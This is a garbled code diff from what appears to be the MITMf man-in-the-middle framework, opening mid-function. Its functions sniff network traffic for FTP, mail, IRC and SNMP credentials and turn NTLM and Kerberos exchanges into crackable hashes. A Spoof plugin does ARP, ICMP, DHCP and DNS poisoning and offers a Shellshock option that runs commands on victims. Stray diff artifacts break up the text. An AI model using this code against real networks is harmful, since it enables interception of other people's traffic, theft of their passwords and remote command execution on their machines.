if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
|
||||
HashLen = struct.unpack('<b',Data[41:42])[0]
|
||||
if HashLen == 54:
|
||||
Hash = Data[44:96]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[144:145])[0]
|
||||
Name = Data[145:145+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
|
||||
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
if HashLen == 53:
|
||||
Hash = Data[44:95]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[143:144])[0]
|
||||
Name = Data[144:144+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
|
||||
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
else:
|
||||
HashLen = struct.unpack('<b',Data[48:49])[0]
|
||||
Hash = Data[49:49+HashLen]
|
||||
SwitchHash = Hash[16:]+Hash[0:16]
|
||||
NameLen = struct.unpack('<b',Data[HashLen+97:HashLen+97+1])[0]
|
||||
Name = Data[HashLen+98:HashLen+98+NameLen]
|
||||
DomainLen = struct.unpack('<b',Data[HashLen+98+NameLen+3:HashLen+98+NameLen+4])[0]
|
||||
Domain = Data[HashLen+98+NameLen+4:HashLen+98+NameLen+4+DomainLen]
|
||||
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
|
||||
return 'MS Kerberos: %s' % BuildHash
|
||||
|
||||
def Decode_Ip_Packet(self, s):
    '''
    Minimal IPv4 header decode (borrowed from PCredz), used only to reach
    the TCP payload for Kerberos parsing.

    s: raw IPv4 packet as a byte string (starting at the IP header).
    Returns a dict with 'header_len' (IHL in 32-bit words) and 'data'
    (everything after the variable-length IP header).
    '''
    # Low nibble of the first octet is the IHL, measured in 4-byte words
    ihl = ord(s[0]) & 0x0f
    return {'header_len': ihl, 'data': s[4 * ihl:]}
|
||||
|
||||
def double_line_checker(self, full_load, count_str):
    '''
    Collapse doubled-up authentication lines down to the latest one.

    Some FTP/mail clients repeat the auth command in one packet, e.g.
    "USER dan\r\nUSER dan\r\n"; when count_str occurs more than once,
    return only the last complete line. Otherwise return full_load
    unchanged.

    full_load: decoded packet payload
    count_str: marker to count (e.g. 'USER' or 'auth'), matched
               case-insensitively
    '''
    # Bug fix: the payload was lowercased but count_str was not, so an
    # uppercase marker like 'USER' could never match. Lowercase both sides.
    num = full_load.lower().count(count_str.lower())
    if num > 1:
        lines = full_load.count('\r\n')
        if lines > 1:
            full_load = full_load.split('\r\n')[-2] # -1 is ''
    return full_load
|
||||
|
||||
def parse_ftp(self, full_load, dst_ip_port):
    '''
    Parse out FTP creds from a client packet.

    full_load:   decoded packet payload
    dst_ip_port: "ip:port" string of the destination, used to flag
                 non-standard FTP ports
    Returns a list of human-readable strings to print/log (possibly empty).
    '''
    messages = []

    # Sometimes FTP packets double up on the authentication lines
    # We just want the lastest one. Ex: "USER danmcinerney\r\nUSER danmcinerney\r\n"
    full_load = self.double_line_checker(full_load, 'USER')

    # FTP and POP potentially use idential client > server auth pkts
    user_match = re.match(self.ftp_user_re, full_load)
    pw_match = re.match(self.ftp_pw_re, full_load)

    if user_match:
        messages.append('FTP User: %s' % user_match.group(1).strip())
    elif pw_match:
        messages.append('FTP Pass: %s' % pw_match.group(1).strip())

    # Either hit on a port other than 21 deserves a heads-up
    if (user_match or pw_match) and dst_ip_port[-3:] != ':21':
        messages.append('Nonstandard FTP port, confirm the service that is running on it')

    return messages
|
||||
|
||||
def mail_decode(self, src_ip_port, dst_ip_port, mail_creds):
    '''
    Decode base64 mail creds and, when successful, log the plaintext.

    src_ip_port/dst_ip_port: "ip:port" endpoint strings for the log line
    mail_creds: base64 blob captured from an AUTH exchange
    Silently does nothing when the blob is not valid base64/UTF-8.
    '''
    try:
        plaintext = base64.b64decode(mail_creds).replace('\x00', ' ').decode('utf8')
        plaintext = plaintext.replace('\x00', ' ')
    except TypeError:
        # Not valid base64 (py2 raises TypeError here)
        plaintext = None
    except UnicodeDecodeError:
        # Decoded bytes were not UTF-8 text
        plaintext = None

    if plaintext is not None:
        self.printer(src_ip_port, dst_ip_port, 'Decoded: %s' % plaintext)
|
||||
|
||||
def mail_logins(self, full_load, src_ip_port, dst_ip_port, ack, seq):
    '''
    Catch IMAP, POP, and SMTP logins.

    Tracks multi-packet AUTH exchanges in self.mail_auths, a mapping of
    "ip:port" -> list of TCP ack numbers seen for that side of the stream,
    and prints/decodes credentials as they appear.
    Returns True when an auth event (creds or pass/fail) was found,
    otherwise returns None implicitly.
    '''
    # Handle the first packet of mail authentication
    # if the creds aren't in the first packet, save it in mail_auths

    # mail_auths = 192.168.0.2 : [1st ack, 2nd ack...]

    found = False

    # Sometimes mail packets double up on the authentication lines
    # We just want the lastest one. Ex: "1 auth plain\r\n2 auth plain\r\n"
    full_load = self.double_line_checker(full_load, 'auth')

    # Client to server 2nd+ pkt
    if src_ip_port in self.mail_auths:
        # NOTE(review): [-1] is a single ack *number*; `seq in <int>` raises
        # TypeError. This probably should be `seq in self.mail_auths[src_ip_port]`
        # or `seq == ...[-1]` — TODO confirm against upstream net-creds.
        if seq in self.mail_auths[src_ip_port][-1]:
            # This packet should carry the base64 creds that followed the
            # initial AUTH command
            stripped = full_load.strip('\r\n')
            try:
                decoded = base64.b64decode(stripped)
                msg = 'Mail authentication: %s' % decoded
                self.printer(src_ip_port, dst_ip_port, msg)
            except TypeError:
                # Not base64; ignore
                pass
            self.mail_auths[src_ip_port].append(ack)

    # Server responses to client
    # seq always = last ack of tcp stream
    elif dst_ip_port in self.mail_auths:
        # NOTE(review): same `in <int>` concern as above — TODO confirm
        if seq in self.mail_auths[dst_ip_port][-1]:
            # Look for any kind of auth failure or success
            a_s = 'Authentication successful'
            a_f = 'Authentication failed'
            # SMTP auth was successful
            if full_load.startswith('235') and 'auth' in full_load.lower():
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_s)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # SMTP failed
            elif full_load.startswith('535 '):
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_f)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # IMAP/POP/SMTP failed
            elif ' fail' in full_load.lower():
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_f)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass
            # IMAP auth success
            elif ' OK [' in full_load:
                # Reversed the dst and src
                self.printer(dst_ip_port, src_ip_port, a_s)
                found = True
                try:
                    del self.mail_auths[dst_ip_port]
                except KeyError:
                    pass

            # Pkt was not an auth pass/fail so its just a normal server ack
            # that it got the client's first auth pkt
            else:
                # Cap the tracking dict at ~100 streams, dropping the oldest
                # (assumes mail_auths is an OrderedDict — popitem(last=False))
                if len(self.mail_auths) > 100:
                    self.mail_auths.popitem(last=False)
                self.mail_auths[dst_ip_port].append(ack)

    # Client to server but it's a new TCP seq
    # This handles most POP/IMAP/SMTP logins but there's at least one edge case
    else:
        mail_auth_search = re.match(self.mail_auth_re, full_load, re.IGNORECASE)
        if mail_auth_search != None:
            auth_msg = full_load
            # IMAP uses the number at the beginning
            if mail_auth_search.group(1) != None:
                auth_msg = auth_msg.split()[1:]
            else:
                auth_msg = auth_msg.split()
            # Check if its a pkt like AUTH PLAIN dvcmQxIQ==
            # rather than just an AUTH PLAIN
            if len(auth_msg) > 2:
                mail_creds = ' '.join(auth_msg[2:])
                msg = 'Mail authentication: %s' % mail_creds
                self.printer(src_ip_port, dst_ip_port, msg)

                self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
                try:
                    del self.mail_auths[src_ip_port]
                except KeyError:
                    pass
                found = True

            # Mail auth regex was found and src_ip_port is not in mail_auths
            # Pkt was just the initial auth cmd, next pkt from client will hold creds
            if len(self.mail_auths) > 100:
                self.mail_auths.popitem(last=False)
            self.mail_auths[src_ip_port] = [ack]

        # At least 1 mail login style doesn't fit in the original regex:
        # 1 login "username" "password"
        # This also catches FTP authentication!
        # 230 Login successful.
        elif re.match(self.mail_auth_re1, full_load, re.IGNORECASE) != None:

            # FTP authentication failures trigger this
            #if full_load.lower().startswith('530 login'):
            #    return

            auth_msg = full_load
            auth_msg = auth_msg.split()
            # Expect exactly: <tag> login <user> <pass> (3 or 4 tokens past the tag)
            if 2 < len(auth_msg) < 5:
                mail_creds = ' '.join(auth_msg[2:])
                msg = 'Authentication: %s' % mail_creds
                self.printer(src_ip_port, dst_ip_port, msg)
                self.mail_decode(src_ip_port, dst_ip_port, mail_creds)
                found = True

    if found == True:
        return True
|
||||
|
||||
def irc_logins(self, full_load):
    '''
    Find IRC logins (NICK/PASS commands) in a packet payload.

    full_load: decoded packet payload
    Returns a printable message string on a hit, otherwise None.
    '''
    user_search = re.match(self.irc_user_re, full_load)
    pass_search = re.match(self.irc_pw_re, full_load)
    if user_search:
        return 'IRC nick: %s' % user_search.group(1)
    if pass_search:
        # Bug fix: this branch referenced src_ip_port/dst_ip_port, which are
        # not parameters of this method (guaranteed NameError), and returned
        # the raw match object. Return the formatted message like the nick
        # branch so the caller can log it.
        return 'IRC pass: %s' % pass_search.group(1)
|
||||
|
||||
def headers_to_dict(self, header_lines):
    '''
    Convert the list of header lines into a dict of
    lowercased-name -> value.

    Each line is split once at ': ', all fragments are flattened, and
    even/odd fragments are zipped back into pairs
    (http://stackoverflow.com/a/406296). Note: a line without ': '
    shifts the pairing of everything after it — kept as-is to match
    the original behavior.
    '''
    fragments = [part for line in header_lines for part in line.split(': ', 1)]
    paired = dict(zip(fragments[0::2], fragments[1::2]))
    # Lowercase the header name (like "Content-Length") for uniform lookups
    return {name.lower(): value for name, value in paired.items()}
|
||||
|
||||
def parse_http_load(self, full_load, http_methods):
    '''
    Split the raw load into the request line, remaining header lines,
    and body string.

    full_load:    decoded packet payload
    http_methods: list of method prefixes (e.g. 'GET ', 'POST ')
    Returns (http_line, header_lines, body); http_line is None when no
    request line is found, in which case the whole payload is treated
    as body.
    '''
    if "\r\n\r\n" in full_load:
        headers, body = full_load.split("\r\n\r\n", 1)
    else:
        # No blank line separator: everything is headers, no body
        headers, body = full_load, ''
    header_lines = headers.split("\r\n")

    # Pkts may just contain hex data and no headers in which case we'll
    # still want to parse them for usernames and password
    http_line = self.get_http_line(header_lines, http_methods)
    if not http_line:
        headers = ''
        body = full_load

    # Drop the request line itself from the header list
    header_lines = [line for line in header_lines if line != http_line]

    return http_line, header_lines, body
|
||||
|
||||
def get_http_line(self, header_lines, http_methods):
    '''
    Return the first header line that begins with an HTTP method
    (the request line), or None when there isn't one.
    '''
    for line in header_lines:
        # / is the only char I can think of that's in every http_line
        # Shortest valid: "GET /", add check for "/"?
        if any(line.startswith(verb) for verb in http_methods):
            return line
|
||||
|
||||
|
||||
def other_parser(self, src_ip_port, dst_ip_port, full_load, ack, seq, pkt):
    '''
    Catch-all parser for a TCP packet: HTTP header auth, Kerberos-over-TCP
    hashes, and raw NTLMSSP type 2/3 messages (MSSQL/DCE-RPC/SMB/LDAP).

    src_ip_port/dst_ip_port: "ip:port" endpoint strings
    full_load: decoded TCP payload
    ack/seq:   TCP ack/seq numbers, used to pair NTLM challenge/response
    pkt:       the scapy packet (str() gives raw bytes; [14:] skips the
               Ethernet header)
    '''

    #For now we will parse the HTTP headers through scapy and not through Twisted
    #This will have to get changed in the future, seems a bit redundent
    http_methods = ['GET ', 'POST ', 'CONNECT ', 'TRACE ', 'TRACK ', 'PUT ', 'DELETE ', 'HEAD ']
    http_line, header_lines, body = self.parse_http_load(full_load, http_methods)
    headers = self.headers_to_dict(header_lines)

    # Kerberos over TCP
    decoded = self.Decode_Ip_Packet(str(pkt)[14:])
    # [20:] skips the fixed TCP header to reach the Kerberos payload
    # (assumes no TCP options — TODO confirm)
    kerb_hash = self.ParseMSKerbv5TCP(decoded['data'][20:])
    if kerb_hash:
        self.printer(src_ip_port, dst_ip_port, kerb_hash)

    # Non-NETNTLM NTLM hashes (MSSQL, DCE-RPC,SMBv1/2,LDAP, MSSQL)
    NTLMSSP2 = re.search(self.NTLMSSP2_re, full_load, re.DOTALL)
    NTLMSSP3 = re.search(self.NTLMSSP3_re, full_load, re.DOTALL)
    if NTLMSSP2:
        # Cache the server challenge keyed by this packet's ack
        self.parse_ntlm_chal(NTLMSSP2.group(), ack)
    if NTLMSSP3:
        # Pair the client response with the cached challenge via seq
        ntlm_resp_found = self.parse_ntlm_resp(NTLMSSP3.group(), seq)
        if ntlm_resp_found != None:
            self.printer(src_ip_port, dst_ip_port, ntlm_resp_found)

    # Look for authentication headers
    # Pre-seed the vars when there are no headers, since the loop below
    # would never run and they'd be referenced unbound afterwards
    if len(headers) == 0:
        authenticate_header = None
        authorization_header = None
    for header in headers:
        authenticate_header = re.match(self.authenticate_re, header)
        authorization_header = re.match(self.authorization_re, header)
        if authenticate_header or authorization_header:
            break

    if authorization_header or authenticate_header:
        # NETNTLM
        netntlm_found = self.parse_netntlm(authenticate_header, authorization_header, headers, ack, seq)
        if netntlm_found != None:
            self.printer(src_ip_port, dst_ip_port, netntlm_found)
|
||||
|
||||
def parse_netntlm(self, authenticate_header, authorization_header, headers, ack, seq):
    '''
    Parse NTLM hashes out of HTTP WWW-Authenticate/Authorization headers.

    authenticate_header:  regex match on the server challenge header, or None
    authorization_header: regex match on the client response header, or None
    headers: dict of lowercased header name -> value
    ack/seq: TCP numbers used to pair challenge with response
    Returns the crackable hash message for a type-3 response, else None.
    '''
    # Type 2 challenge from server
    if authenticate_header is not None:
        self.parse_netntlm_chal(headers, authenticate_header.group(), ack)

    # Type 3 response from client
    elif authorization_header is not None:
        msg = self.parse_netntlm_resp_msg(headers, authorization_header.group(), seq)
        if msg is not None:
            return msg
|
||||
|
||||
def parse_snmp(self, src_ip_port, dst_ip_port, snmp_layer):
    '''
    Parse out the SNMP version and community string from a scapy SNMP
    layer and log them. Returns True on a hit, else None.
    '''
    community = snmp_layer.community.val
    if type(community) == str:
        msg = 'SNMPv%d community string: %s' % (snmp_layer.version.val, community)
        self.printer(src_ip_port, dst_ip_port, msg)
        return True
|
||||
|
||||
def parse_netntlm_chal(self, headers, chal_header, ack):
    '''
    Parse the netntlm server challenge out of an HTTP header.
    https://code.google.com/p/python-ntlm/source/browse/trunk/python26/ntlm/ntlm.py

    headers:     dict of lowercased header name -> value
    chal_header: key of the WWW-Authenticate-style header
    ack:         TCP ack number used to key the cached challenge
    '''
    header_val2 = headers[chal_header]
    header_val2 = header_val2.split(' ', 1)
    # The header value can either start with NTLM or Negotiate
    if header_val2[0] == 'NTLM' or header_val2[0] == 'Negotiate':
        msg2 = header_val2[1]
        msg2 = base64.decodestring(msg2)
        # Bug fix: arguments were swapped (was parse_ntlm_chal(ack, msg2));
        # parse_ntlm_chal's signature is (msg2, ack) — the swapped call made
        # its msg_type==2 assertion run against the TCP ack number. The call
        # in other_parser passes (msg2, ack) correctly; match it here.
        self.parse_ntlm_chal(msg2, ack)
|
||||
|
||||
def parse_ntlm_chal(self, msg2, ack):
    '''
    Parse an NTLM type 2 (server challenge) message and cache the
    8-byte challenge, hex-encoded, keyed by the TCP ack number so the
    matching type 3 response can be paired with it later.
    '''
    # Bytes 0-8 are the NTLMSSP signature; bytes 8-12 hold the message
    # type, which must be 2 for a server challenge
    msg_type = struct.unpack("<I", msg2[8:12])[0]
    assert(msg_type == 2)
    server_challenge = msg2[24:32].encode('hex')

    # Keep the dict of ack:challenge to less than 50 chals
    # (assumes challenge_acks is an OrderedDict — popitem(last=False)
    # evicts the oldest entry)
    if len(self.challenge_acks) > 50:
        self.challenge_acks.popitem(last=False)
    self.challenge_acks[ack] = server_challenge
|
||||
|
||||
def parse_netntlm_resp_msg(self, headers, resp_header, seq):
    '''
    Parse the client response to the NTLM challenge out of an
    Authorization-style HTTP header.

    headers:     dict of lowercased header name -> value
    resp_header: key of the Authorization header
    seq:         TCP seq number used to look up the cached challenge
    Returns the crackable hash string from parse_ntlm_resp, or None.
    '''
    resp_value = headers[resp_header].split(' ', 1)

    # The header value can either start with NTLM or Negotiate
    if resp_value[0] in ('NTLM', 'Negotiate'):
        msg3 = base64.decodestring(resp_value[1])
        return self.parse_ntlm_resp(msg3, seq)
|
||||
|
||||
def parse_ntlm_resp(self, msg3, seq):
    '''
    Parse the 3rd msg in NTLM handshake (the client's type 3 response)
    and build a john/hashcat-style NETNTLMv1/v2 string.
    Thanks to psychomario

    msg3: raw type 3 NTLMSSP message bytes
    seq:  TCP seq number, used to look up the cached server challenge
    Returns the formatted hash message, or None when the message is too
    short or the NT response length matches neither v1 nor v2.
    '''

    # Pair this response with the challenge cached by parse_ntlm_chal
    if seq in self.challenge_acks:
        challenge = self.challenge_acks[seq]
    else:
        challenge = 'CHALLENGE NOT FOUND'

    # 44 bytes covers the fixed header plus the LM/NT/domain/user
    # security-buffer descriptors unpacked below
    if len(msg3) > 43:
        # Thx to psychomario for below
        # Each field is a (len, maxlen, offset) triple; "12x" skips the
        # signature + message-type header
        lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44])
        lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen])
        nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen])
        # Strip the NULs from the UTF-16LE domain/user strings
        domain = msg3[domoff:domoff+domlen].replace("\0", "")
        user = msg3[useroff:useroff+userlen].replace("\0", "")
        # Original check by psychomario, might be incorrect?
        #if lmhash != "0"*48: #NTLMv1
        if ntlen == 24: #NTLMv1
            msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge)
            return msg
        elif ntlen > 60: #NTLMv2
            # v2 format splits the NT response into the 16-byte NTProofStr
            # (32 hex chars) and the variable-length blob
            msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:])
            return msg
|
||||
|
||||
def printer(self, src_ip_port, dst_ip_port, msg):
    '''
    Log a capture result. Credentials carry both endpoints and are
    logged as "src --> dst msg"; URL-style hits pass dst_ip_port=None
    and are logged with just the source IP.
    '''
    # All credentials will have dst_ip_port, URLs will not
    if dst_ip_port is not None:
        mitmf_logger.info('%s --> %s %s' % (src_ip_port, dst_ip_port, msg))
    else:
        mitmf_logger.info('%s %s' % (src_ip_port.split(':')[0], msg))
|
165
plugins/Spoof.py
165
plugins/Spoof.py
|
@ -19,111 +19,122 @@
|
|||
#
|
||||
|
||||
import logging
|
||||
import sys
|
||||
|
||||
from sys import exit
|
||||
from core.utils import SystemConfig, IpTables
|
||||
from core.sslstrip.DnsCache import DnsCache
|
||||
from core.wrappers.protocols import _ARP, _DHCP, _ICMP
|
||||
from core.protocols.arp.ARPpoisoner import ARPpoisoner
|
||||
from core.protocols.arp.ARPWatch import ARPWatch
|
||||
from core.dnschef.DNSchef import DNSChef
|
||||
from core.protocols.dhcp.DHCPServer import DHCPServer
|
||||
from core.protocols.icmp.ICMPpoisoner import ICMPpoisoner
|
||||
from plugins.plugin import Plugin
|
||||
from core.dnschef.dnschef import DNSChef
|
||||
|
||||
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
|
||||
from scapy.all import *
|
||||
|
||||
class Spoof(Plugin):
|
||||
name = "Spoof"
|
||||
optname = "spoof"
|
||||
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
||||
version = "0.6"
|
||||
has_opts = True
|
||||
name = "Spoof"
|
||||
optname = "spoof"
|
||||
desc = "Redirect/Modify traffic using ICMP, ARP, DHCP or DNS"
|
||||
tree_output = list()
|
||||
version = "0.6"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.dnscfg = options.configfile['MITMf']['DNS']
|
||||
self.dhcpcfg = options.configfile['Spoof']['DHCP']
|
||||
self.target = options.target
|
||||
self.manualiptables = options.manualiptables
|
||||
self.protocolInstances = []
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.dnscfg = self.config['MITMf']['DNS']
|
||||
self.dhcpcfg = self.config['Spoof']['DHCP']
|
||||
self.targets = options.targets
|
||||
self.manualiptables = options.manualiptables
|
||||
self.mymac = SystemConfig.getMAC(options.interface)
|
||||
self.myip = SystemConfig.getIP(options.interface)
|
||||
self.protocolInstances = []
|
||||
|
||||
#Makes scapy more verbose
|
||||
debug = False
|
||||
if options.log_level is 'debug':
|
||||
debug = True
|
||||
#Makes scapy more verbose
|
||||
debug = False
|
||||
if options.log_level == 'debug':
|
||||
debug = True
|
||||
|
||||
if options.arp:
|
||||
if options.arp:
|
||||
|
||||
if not options.gateway:
|
||||
sys.exit("[-] --arp argument requires --gateway")
|
||||
if not options.gateway:
|
||||
exit("[-] --arp argument requires --gateway")
|
||||
|
||||
arp = _ARP(options.gateway, options.interface, options.mac_address)
|
||||
arp.target = options.target
|
||||
arp.arpmode = options.arpmode
|
||||
arp.debug = debug
|
||||
if options.targets is None:
|
||||
#if were poisoning whole subnet, start ARP-Watch
|
||||
arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
|
||||
arpwatch.debug = debug
|
||||
|
||||
self.protocolInstances.append(arp)
|
||||
self.tree_output.append("ARPWatch online")
|
||||
self.protocolInstances.append(arpwatch)
|
||||
|
||||
elif options.icmp:
|
||||
arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
|
||||
arp.arpmode = options.arpmode
|
||||
arp.debug = debug
|
||||
|
||||
if not options.gateway:
|
||||
sys.exit("[-] --icmp argument requires --gateway")
|
||||
self.protocolInstances.append(arp)
|
||||
|
||||
if not options.target:
|
||||
sys.exit("[-] --icmp argument requires --target")
|
||||
|
||||
icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address)
|
||||
icmp.debug = debug
|
||||
elif options.icmp:
|
||||
|
||||
self.protocolInstances.append(icmp)
|
||||
if not options.gateway:
|
||||
exit("[-] --icmp argument requires --gateway")
|
||||
|
||||
elif options.dhcp:
|
||||
if not options.targets:
|
||||
exit("[-] --icmp argument requires --targets")
|
||||
|
||||
if options.target:
|
||||
sys.exit("[-] --target argument invalid when DCHP spoofing")
|
||||
icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, options.ip_address)
|
||||
icmp.debug = debug
|
||||
|
||||
dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address)
|
||||
dhcp.shellshock = options.shellshock
|
||||
dhcp.debug = debug
|
||||
self.protocolInstances.append(dhcp)
|
||||
self.protocolInstances.append(icmp)
|
||||
|
||||
if options.dns:
|
||||
elif options.dhcp:
|
||||
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().dns is False:
|
||||
IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port'])
|
||||
if options.targets:
|
||||
exit("[-] --targets argument invalid when DCHP spoofing")
|
||||
|
||||
DNSChef.getInstance().loadRecords(self.dnscfg)
|
||||
dhcp = DHCPServer(options.interface, self.dhcpcfg, options.ip_address, options.mac_address)
|
||||
dhcp.shellshock = options.shellshock
|
||||
dhcp.debug = debug
|
||||
self.protocolInstances.append(dhcp)
|
||||
|
||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||
sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
||||
if options.dns:
|
||||
|
||||
SystemConfig.setIpForwarding(1)
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().dns is False:
|
||||
IpTables.getInstance().DNS(self.myip, self.dnscfg['port'])
|
||||
|
||||
if not options.manualiptables:
|
||||
if IpTables.getInstance().http is False:
|
||||
IpTables.getInstance().HTTP(options.listen)
|
||||
DNSChef.getInstance().loadRecords(self.dnscfg)
|
||||
|
||||
for protocol in self.protocolInstances:
|
||||
protocol.start()
|
||||
if not options.arp and not options.icmp and not options.dhcp and not options.dns:
|
||||
exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")
|
||||
|
||||
def add_options(self, options):
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--target', dest='target', default=None, help='Specify a host to poison [default: subnet]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='req', choices=["req", "rep"], help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
|
||||
#options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')
|
||||
SystemConfig.setIpForwarding(1)
|
||||
|
||||
def finish(self):
|
||||
for protocol in self.protocolInstances:
|
||||
if hasattr(protocol, 'stop'):
|
||||
protocol.stop()
|
||||
if not options.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
if IpTables.getInstance().http is False:
|
||||
IpTables.getInstance().HTTP(options.listen)
|
||||
|
||||
if not self.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
for protocol in self.protocolInstances:
|
||||
protocol.start()
|
||||
|
||||
SystemConfig.setIpForwarding(0)
|
||||
def add_options(self, options):
|
||||
group = options.add_mutually_exclusive_group(required=False)
|
||||
group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
|
||||
group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
|
||||
group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
|
||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Proxy/Modify DNS queries')
|
||||
options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
|
||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||
options.add_argument('--targets', dest='targets', default=None, help='Specify host/s to poison [if ommited will default to subnet]')
|
||||
options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')
|
||||
|
||||
def finish(self):
|
||||
for protocol in self.protocolInstances:
|
||||
if hasattr(protocol, 'stop'):
|
||||
protocol.stop()
|
||||
|
||||
if not self.manualiptables:
|
||||
IpTables.getInstance().Flush()
|
||||
|
||||
SystemConfig.setIpForwarding(0)
|
||||
|
|
|
@ -23,8 +23,6 @@ from cStringIO import StringIO
|
|||
from plugins.plugin import Plugin
|
||||
from PIL import Image
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Upsidedownternet(Plugin):
|
||||
name = "Upsidedownternet"
|
||||
optname = "upsidedownternet"
|
||||
|
@ -65,7 +63,7 @@ class Upsidedownternet(Plugin):
|
|||
im.save(output, format=image_type)
|
||||
data = output.getvalue()
|
||||
output.close()
|
||||
mitmf_logger.info("%s Flipped image" % request.client.getClientIP())
|
||||
mitmf_logger.info("{} Flipped image".format(request.client.getClientIP()))
|
||||
except Exception as e:
|
||||
mitmf_logger.info("%s Error: %s" % (request.client.getClientIP(), e))
|
||||
mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e))
|
||||
return {'request': request, 'data': data}
|
||||
|
|
|
@ -3,4 +3,3 @@
|
|||
import os
|
||||
import glob
|
||||
__all__ = [ os.path.basename(f)[:-3] for f in glob.glob(os.path.dirname(__file__)+"/*.py")]
|
||||
|
||||
|
|
|
@ -2,9 +2,12 @@
|
|||
The base plugin class. This shows the various methods that
|
||||
can get called during the MITM attack.
|
||||
'''
|
||||
from core.configwatcher import ConfigWatcher
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class Plugin(object):
|
||||
class Plugin(ConfigWatcher, object):
|
||||
name = "Generic plugin"
|
||||
optname = "generic"
|
||||
desc = ""
|
||||
|
@ -15,6 +18,10 @@ class Plugin(object):
|
|||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
|
||||
def startThread(self, options):
|
||||
'''Anything that will subclass this function will be a thread'''
|
||||
return
|
||||
|
||||
def add_options(options):
|
||||
'''Add your options to the options parser'''
|
||||
raise NotImplementedError
|
||||
|
@ -27,6 +34,10 @@ class Plugin(object):
|
|||
'''Handles outgoing request'''
|
||||
raise NotImplementedError
|
||||
|
||||
def pluginReactor(self, strippingFactory):
|
||||
'''This sets up another instance of the reactor on a diffrent port'''
|
||||
pass
|
||||
|
||||
